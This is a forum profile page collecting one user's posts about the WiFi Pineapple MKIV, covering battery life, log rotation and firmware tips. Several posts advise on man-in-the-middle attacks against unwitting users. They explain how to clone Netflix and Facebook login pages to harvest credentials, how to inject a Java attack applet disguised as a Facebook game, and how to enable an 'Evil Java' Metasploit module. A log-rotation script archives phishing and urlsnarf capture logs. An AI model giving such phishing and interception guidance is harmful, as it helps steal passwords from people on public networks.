RebelCork

Everything posted by RebelCork

  1. Just wondering if anyone did any April Fools' pranks with their pineapple today? I kept redirecting all clients to Daily Mail. Thinking of a certain goat** but wanted my wife to continue talking to me :0
  2. That looks about as legit as this : ;)
  3. I was thinking this too last week, I had so many problems doing my testing. May I suggest an 'Auto WLAN Restart' feature, if we are working via wifi, as if I turn off WLAN0 to restart site survey, I obviously cannot log back into the pineapple. The only thing I could do to get it back on was via setting up a button to turn it on (in the beta 1.1 firmware, button module).
  4. It's adding a new file, it is basically moving & renaming each log to log.1, log.2 etc. My own aim is to have the logs emailed to me every couple of hours. I might tweak the above script with the 'logrotate' command from the opkg packages, as I see it also supports emailing logfiles. I don't want to add everything to one file, just in case there is an interruption in power when I am writing. Again, it's a work in progress, so, please, any suggestions are more than welcome.
  5. I was thinking of logrotate, but I wanted to keep something simple and able to run when I choose, not just daily, weekly etc, as some of my log files will get large fairly quickly. I may alter the script to run and email each log-file once it's saved. Thanks for the feedback, I'm honoured !
  6. Hi all,

     Please find below my attempt at a quick script for rotating the logfiles created by the pineapple. I am using ssmtp to email the logfiles back to me after 13 rotations (feel free to customise). I also added a cron job to run the script every 30 mins.

     It's very rough, please feel free to add your suggestions, I'm not a coder, this is my first script for the pineapple. It's not the best script ever, but it is doing the job so far for me (tested on MKIV running 1.10 beta).

     It basically creates a folder on the usb drive called rotatelogs. It scans the /www/pineapple folder for any log files and moves them to the rotatelogs folder on the usb drive. The user can also decide the rotation schedule (in days) for each individual file.

     rotatelogs.conf (I stored this in /www/pineapple/rotate)

         # Configuration file for the rotate log script.
         # Format is name=duration where 'name' can be any
         # filename that appears in the /www/pineapple directory
         # Duration is measured in days
         #
         # 30 mins = 0.020833333 day (0.2)
         # 60 mins = 0.04 etc
         phish.log=0.02
         urlsnarf.log=0.04
         # Anything with a duration of zero is not rotated
         # i.e phish.log=0

     rotatelogs.sh

         #!/bin/sh
         # rotatelogs - Rolls logfiles in /www/pineapple to /usb/rotatelogs for archival purposes
         # uses a config file to allow customisation of how frequently
         # each log should be backed up to the folder
         # the config file is in logfilename=duration format
         # where duration is in days
         # if the logfile is not in the config file, default_duration is used

         logdir="/usb/rotatelogs"
         config="/www/pineapple/rotate/rotatelogs.conf"
         mv="/bin/mv"
         default_duration=0.04
         count=0

         # -p: don't fail when the folder already exists (the script runs from cron)
         mkdir -p "$logdir"

         if [ ! -f "$config" ] ; then
             echo "$0: no config file found. Can't proceed." >&2; exit 1
         fi

         if [ ! -w "$logdir" -o ! -x "$logdir" ] ; then
             echo "$0: You don't have the required permissions in $logdir" >&2; exit 1
         fi

         cd "$logdir" || exit 1

         # This is the meat of the program
         for path in /www/pineapple/*.log
         do
             [ -f "$path" ] || continue      # no log files matched the pattern
             count=$(( count + 1 ))

             # the config file and the backups use the bare filename, not the full path
             name="$(basename "$path")"

             # grabbing this entry from the config file
             duration="$(grep "^${name}=" "$config" | cut -d= -f2)"

             if [ -z "$duration" ] ; then
                 duration=$default_duration
             elif [ "$duration" = "0" ] ; then
                 echo "Duration set to zero; Skipping $name"
                 continue
             fi

             # I have inputed 13 log files, one per hour
             # (name.1 is the newest backup, name.13 the oldest, all kept in $logdir)
             back1="${name}.1"

             # if the most recently rolled log file (back1) has been modified within
             # the specific timeframe, then it won't be rotated.
             if [ -f "$back1" ] ; then
                 if [ -z "$(find "$back1" -mtime +"$duration" -print 2>/dev/null)" ] ; then
                     echo "$name's most recent backup is more recent than $duration days: Skipping"
                     continue
                 fi
             fi

             echo "Rotating log $name (using a $duration day schedule)"

             # The most recent backup is emailed before it is rotated.
             # Change user@domain.com to your ssmtp settings
             if [ -f "$back1" ] ; then
                 ssmtp -v user@domain.com < "$back1"
             fi

             # Rotating logfiles here, starting with the oldest first
             i=12
             while [ "$i" -ge 1 ] ; do
                 next=$(( i + 1 ))
                 if [ -f "${name}.${i}" ] ; then
                     echo "... ${name}.${i} -> ${name}.${next}"
                     $mv -f "${name}.${i}" "${name}.${next}"
                 fi
                 i=$(( i - 1 ))
             done

             # move the live log onto the usb drive and start a fresh one
             echo "... $path -> $logdir/$back1"
             $mv -f "$path" "$back1"

             touch "$path"
             chmod 0700 "$path"
         done

         if [ $count -eq 0 ] ; then
             echo "Nothing to do: No log files big enough or old enough to rotate"
         fi

         exit 0
  7. Can't yous just set up iptables to block any unwanted traffic? The 'victim' won't be too affected, as if he is trying to access something in a coffee shop scenario, these things will likely be blocked. Have iptables point to a 404 error for this kind of 'bad' traffic. Remember, you are the MITM, you are the ISP. :) Running urlsnarf, you will see what type of sites to block and write a rule for it. It may take a little bit of trial and error, but hell, that's how we learn.
  8. Without the 3g dongle, I have been getting around 16 hours (on for 3 or 4 hours a day). I have left it on all day at home, but there wasn't much activity. I'm sure as more clients connect, the battery will decrease due to increased load. That's next on my list to test, but I know the battery won't die after only 1 or 2 hours in the wild!
  9. Send them to free up space. I was thinking of sending them into tcpdump/snort to see packets and initiate logs. I love the idea of being able to get an hourly report for example, and see what kind of data has gone through. It'll be my Easter project to get some sort of automated sniffer going, and hell maybe fit that into a module (even a basic one)
  10. I am asking a genuine question. I was thinking something similar, using a cron job to rotate the logs and email them at regular intervals, i.e. have 13 rotating logfiles, each rotating at 5 min intervals, and the sendmail sending out every hour. My other option would have been a netcat type. I wanted to do that instead of leaving it on the usb card. I haven't used linux since I was in university! Give a 'newbie' some credit, I'm only thinking out loud! :)
  11. Remember, once you start cloning your chosen sites, input your own code snippets/design your own login area (username & password fields). You just have to make it look real enough to fool a casual user. One of the points about MITM attacks is that we feel secure and trusting of our ISP, especially when it looks like we are connected to our own network. So long as the login page is simple and looks legit to the end user, they will easily enter creds. Just my opinion! :)
  12. I agree. Best way is to set up a VM machine purely to be the 'victim' of your attack on a local network (I have a separate wifi connection, only for testing). Then scale from there. A lot of the attacks in SET are targeted at machines with older OS's. Learn to play with Metasploit, starting with Armitage to see different attacks and how to write your own (easy). Then, you can perform tests over the internet as your confidence grows.
  13. I also use sshfs for Mac OSX. This is the best way to install it:

          cd ~/Downloads
          ## Download the latest version (as found on fuse4x.org) and install
          wget https://github.com/downloads/fuse4x/fuse4x/Fuse4X-0.8.7.pkg
          open Fuse4X-0.8.7.pkg
          ## Get the latest version of SSHFS (as found on github.com/fuse4x/fuse4x/downloads)
          wget https://github.com/downloads/fuse4x/fuse4x/sshfs-2.3.0.zip
          ## Install sshfs binary to /usr/local/bin/sshfs (and install man page):
          unzip sshfs-2.3.0.zip -d /

      Hope it helps. Source: Here
  14. Change it to a button that you can control so (point to error.php). The easiest thing to do is keep a 'snippets' tool handy and copy any 'useful' bits of code into it. That way, when you quickly want to change an element on a web page, you have a predefined bit of code that you need. With php/html, you can't do any damage, so play around and have fun!
  15. +1 Perfect for espresso. I can tweak php files on the go now, thanks!
  16. I don't think you can add a wireless card at the moment.
  17. Looking at the source files for Netflix, the actual login.php page is not on the home page. Why don't you try the following? Clone/copy the standard front page of netflix and the login.php page to your MKIV. Find the link to login.php and change it to your desired location. In the login.php from the website, change the action method as suggested in the tutorials. Should work! Try this and play around. Extra bonus points for learning basic html and php! B)
  18. DNS Spoof is running and you have the run.html offering up a java attack applet. It will run constantly, you can't turn it off without replacing the redirected page. If you really wanted to, you could try altering an existing web page to inject the java code for the user instead of a blank page. For example, clone www.facebook.com and insert the code into the webpage. That way, when your victim machine browses to the infected page the script is run automatically and they are not sitting looking at a blank screen. Also a particularly nasty attack would be to disguise the attack vector as one of the many popular FB games. With an active internet connection to the pineapple, the victim will continue on his/her way to the login page, and you get the chance to steal passwords as well. These are some of the theoretical situations I am trying to defend against. (I am trying to write a term paper for college on MITM attacks)
  19. I think ngrep and urlsnarf aren't 100% functional on MKIV. (Sebkinne says: ngrep is not installed currently) (Thought so: :) ) I think it's in the list of to fix for next release of firmware, if I'm right. See this thread: MKIV - What we know and don't know
  20. The attack itself will work on mkiv, although the index.php file that is included in the package should not be uploaded. Instead you can backup your existing index.php file in the pineapple folder before making any changes:

          cp index.php index.bak

      Open the one from the package above (MKIII), copy the following code and paste it into the php segment of your MKIV index.php file:

          $isjavaup = exec("cat up");
          if ($isjavaup != "") {
              echo "Evil Java is currently <font color=\"lime\"><b>enabled</b></font>. | <a href=\"stopjava.php\"><b>Stop</b></a><br />";
          } else {
              echo "Evil Java is currently <font color=\"red\"><b>disabled</b></font>. | <a href=\"startjava.php\"><b>Start</b></a> | <a href=\"conf.php\"><b>Conf</b></a><br/>";
          }

      Reboot your pineapple, and you should see the Evil Java option. Change your landing page to redirect to /java/run.html. So far on my tests, this has worked for me, with access to metasploit working. The only thing is, the switch status (on/off) does not work. I hope that helps, but I'm a metasploit newbie myself!
  21. Noob question (sorry!) Which monitor interface does it use, as there is the wlan.mon0 monitor interface, but isn't that used for karma. Does this also break karma, as when I try it, I can't get an AP ? I'm running 1.02, MKIV. BTW, I've tweaked my navbar.php to include site_survey.php as a menu option. Thanks again **Edit ** killuminati just beat me to it :) **Edit** I've just answered my own question I just restarted wlan0 and I could perform deauths and still have karma running.
  22. Unfortunately the wifipineapple.com site is down. Sebkinne is in the process of transferring it to github. :)
  23. Thanks ! Been looking for this (and annoying many, many other posters!). I have done a quick edit and added the link to the file on the wiki for any other noobs such as myself!
  24. Have been using this with a USB cable like Splicer recommends above passing through my USB port on my Mac/ TeckNet iEP390 Battery Pack (11000mAh). Haven't tried it with a 3G dongle as yet, but I think there might not be enough draw from one USB port. Perhaps someone should source one of those dual USB to single power port power cables, giving 10v power??